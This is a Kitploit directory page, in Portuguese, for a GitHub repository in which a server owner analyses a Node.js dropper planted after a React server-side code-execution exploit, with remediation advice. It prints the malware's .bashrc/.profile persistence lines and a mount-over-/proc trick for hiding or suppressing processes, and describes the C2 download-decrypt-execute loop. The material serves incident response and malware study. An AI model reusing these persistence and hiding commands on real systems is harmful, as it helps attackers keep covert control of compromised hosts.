Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
react-cve-2025-55182 — malware que encontrei no meu servidor | Kitploit
Ferramentas/GitHubGitHub/stonelinks/react-cve-2025-55182
Mecanismos de PersistênciaEngenharia ReversaExfiltração de DadosAnálise ForenseAnálise de MalwareComando e ControleInteligência de AmeaçasResposta a IncidentesDesenvolvimento de Payloads
GitHubstonelinks/react-cve-2025-55182

react-cve-2025-55182

malware que encontrei no meu servidor

há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

react-cve-2025-55182

Isto é um despejo de malware e outros lixos suspeitos que encontrei no servidor do meu site de casamento após o exploit de execução de código na renderização server-side do react. É um droplet básico da Digital Ocean executando um aplicativo next js bastante comum.

A CVE: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

Um registro de atividade do servidor mostrando vários picos e coisas do tipo: imagem

O principal vilão parece ser esta coisa instalada em /.local/share/.r0qsv8h1

Coisas que encontrei

No meu bashrc:

root@kitploit:~
# System
(nohup /.local/share/.r0qsv8h1/.394ly8v9/bin/node /.local/share/.r0qsv8h1/.fvq2lzl64e.js >/dev/null 2>&1 &) 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null

Observe que os pgreps estão lá para impedir que este outro malware falso "meshagent" seja executado. Você pode ler sobre isso no documento MESHAGENT.md.

no meu profile há o mesmo

root@kitploit:~
# App
(/.local/share/.r0qsv8h1/.394ly8v9/bin/node /.local/share/.r0qsv8h1/.fvq2lzl64e.js >/dev/null 2>&1 &) 2>/dev/null

Você pode ver outros serviços suspeitos em SUSPICIOUS_SERVICES.md

Aqui está uma análise deste malware principal:

Visão geral do conteúdo de /.local/

O diretório bad contém um runtime Node.js autocontido empacotado com um conjunto de arquivos JavaScript fortemente ofuscados.
Todas as evidências apontam para um dropper malicioso que contata silenciosamente um servidor remoto, baixa um payload criptografado, o descriptografa, grava-o em disco e o executa como um processo em segundo plano destacado. O código também verifica periodicamente o servidor em busca de atualizações.

Arquivos e suas finalidades

Decodificação do manifesto

O payload Base64 em .5f8562 decodifica para:

root@kitploit:~
{
  "0": "c6aeb84b-0600-4e82-ae3e-f7d441a2fd7c",
  "1": ".fvq2lzj6te.js",
  "3": 1765307786421,
  "4": "desktop"
}
  • Chave "1" faz referência ao script carregador principal ofuscado.
  • Chave "0" é um UUID provavelmente usado pelo servidor remoto para rastreamento.
  • Chave "3" é um timestamp (ms desde a época Unix) indicando quando o manifesto foi gerado.
  • Chave "4" indica o local pretendido (desktop), sugerindo que o payload pode tentar se esconder ali.

Fluxo de execução

  1. Bootstrap – Quando o binário Node empacotado é iniciado (ex.: node .5f8562), o manifesto aponta para .fvq2lzj6te.js.
  2. Downloader – O carregador cria uma solicitação JSON-RPC para um servidor remoto de comando e controle, recebe um blob codificado em base64 e o descriptografa usando um algoritmo personalizado semelhante ao RC4.
  3. Implantação do payload – Os dados descriptografados são gravados em um arquivo com nome aleatório no ambiente do usuário e executados como um processo filho destacado.
  4. Persistência / loop de atualização – Um temporizador setInterval repete periodicamente a sequência baixar-descriptografar-executar, permitindo que o atacante envie payloads novos ou atualizados sem interação adicional do usuário.
  5. Execução em segundo plano – O processo iniciado é executado com seu próprio ambiente (PATH, cwd, etc.) e pode realizar ações maliciosas típicas, como mineração de criptomoedas, roubo de credenciais ou execução remota de comandos.

Impacto potencial

  • Comprometimento do sistema – Execução arbitrária de código com os privilégios do usuário que iniciou o runtime do Node.
  • Persistência – A consulta periódica garante que o malware possa ser atualizado ou substituído a qualquer momento.
  • Abuso de recursos – Provavelmente executará tarefas intensivas de CPU (ex.: mineração de criptomoedas) ou exfiltrará dados.
  • Furtividade – Os arquivos são fortemente ofuscados e a presença de um README do Node com aparência legítima ajuda a ocultar a natureza maliciosa.

Recomendações

  1. Remoção imediata – Exclua todo o diretório .r0qsv8h1 e quaisquer arquivos que ele possa ter criado (verifique o Desktop do usuário e os diretórios temporários em busca de executáveis recém-criados).
  2. Verificação do sistema – Execute um scanner antimalware confiável no host para detectar quaisquer componentes residuais.
  3. Verifique os caminhos de execução – Garanta que nenhum script de inicialização ou tarefa agendada faça referência a arquivos neste diretório.
  4. Monitoramento de rede – Bloqueie conexões de saída para IPs/hosts desconhecidos a partir da máquina afetada e revise o tráfego de rede recente em busca de solicitações de saída suspeitas.
  5. Atualize as políticas de segurança – Restrinja a execução de binários e scripts desconhecidos, especialmente aqueles baixados para locais graváveis pelo usuário.

Esta análise foi realizada automaticamente por um assistente de IA com base em um exame estático dos arquivos presentes no diretório. Nenhuma execução em tempo de execução foi realizada.

Você pode ler mais em DEOBFUSCATE.md

Baixar ferramenta
ArquivoDescrição
.394ly8v9/README.mdREADME padrão do Node.js – não relacionado à funcionalidade maliciosa; presente apenas para fazer o pacote parecer legítimo.
.fvq2lzl64e.js~5 KB de JavaScript ofuscado. Ele constrói uma solicitação HTTP JSON-RPC, recebe um payload codificado em base64, o descriptografa com uma cifra personalizada, grava o payload em um arquivo aleatório e o executa via child_process.spawn / execSync. Ele também inicia um processo em segundo plano destacado que consulta repetidamente o servidor remoto.
.lauphhtqrg.js~13 KB de JavaScript ofuscado. Implementa um loop semelhante de baixar-descriptografar-executar com sua própria cifra estilo RC4 (dec). Grava o payload descriptografado em um nome de arquivo gerado e o executa. Configura um temporizador para buscar novos payloads mais tarde.
.5f8562String Base64 em texto puro. Decodifica para um pequeno manifesto JSON: json { "0":"c6aeb84b-0600-4e82-ae3e-f7d441a2fd7c", "1":".fvq2lzj6te.js", "3":1765307786421, "4":"desktop" } Este manifesto informa ao carregador qual script executar (.fvq2lzj6te.js) e fornece um identificador/timestamp.
.b0rtqscrkeovAinda não examinado, mas o padrão de nomenclatura sugere que é outro componente da mesma cadeia maliciosa.
bin/node e arquivos lib/ correspondentesUm runtime completo do Node.js, permitindo que os scripts sejam executados em um sistema mesmo que o Node.js não esteja instalado.